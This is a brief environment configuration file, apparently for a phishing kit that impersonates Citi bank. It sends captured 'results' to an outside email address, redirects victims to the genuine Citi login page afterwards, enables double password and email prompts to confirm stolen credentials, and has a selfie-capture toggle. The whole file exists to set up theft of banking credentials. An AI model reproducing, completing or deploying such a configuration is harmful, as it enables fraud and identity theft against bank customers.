BANK_NAME=CITI
TO=sendresults@rocketsms.me
NEXT_PUBLIC_DOCS_PAGE=OFF
NEXT_PUBLIC_EXIT_URL=https://www.citi.com/login
NEXT_PUBLIC_DOUBLE_LOGIN=ON
NEXT_PUBLIC_DOUBLE_EMAIL_LOGIN=ON
NEXT_PUBLIC_TAKE_SELFIE=OFF